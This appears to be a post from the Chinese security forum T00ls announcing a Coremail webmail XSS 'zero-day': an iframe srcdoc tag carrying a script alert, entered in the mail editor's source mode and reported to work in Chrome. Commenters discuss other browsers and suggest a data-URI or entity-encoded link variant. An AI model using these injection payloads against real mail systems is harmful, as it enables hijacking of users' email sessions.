来个coremail XSS 0day
coremail 神马东西 不用说了
写邮件时源码编辑
<iframe srcdoc='<script>alert(1)</script>
'>
chrome下XSS 成功
写邮件时源码编辑
<iframe srcdoc='<script>alert(1)</script>
'>
chrome下XSS 成功
## 前言最近在测试某系统的时候,发现瑞数好像最近又升级了,以 ...
### 自我介绍simeon,前阿里巴巴集团安全部高级安全专家,曾就职 ...
### 自我介绍大家好,我是陈博(ID:xiya),目前就职于启明星辰 ...
## 前言如同标题一样, 本篇文章会介绍反序列化漏洞的基本原理, ...
# 概述**本人技术菜,有些技术性如果错误,请大家指正。****本文 ...
自认为整个过程写的非常详细,虽然此文章我发表到某平台,但是没 ...
T00ls.Com版权所有。T00ls所有原创文章未经管理团队许可,禁止一切形式的转载。
Copyright © 2008 - 2025 T00ls All Rights Reserved.

评论9次
IE8试试
应该是怎么显示的啊 你直接用代码方式粘贴不就行了 不要普通粘贴
这个好啊 我们能做些什么啊
截个图传个图片吧。
单引号内输入的是实体字符 但给显示成字母了。
只针对chrome? 土司哪里显示有问题?
这个漏洞也不难找
<a href="data或者实体字符“>点我</a>能够通杀所有浏览器 但不够主动
土司显示不正确 单引号里面都是实体字符的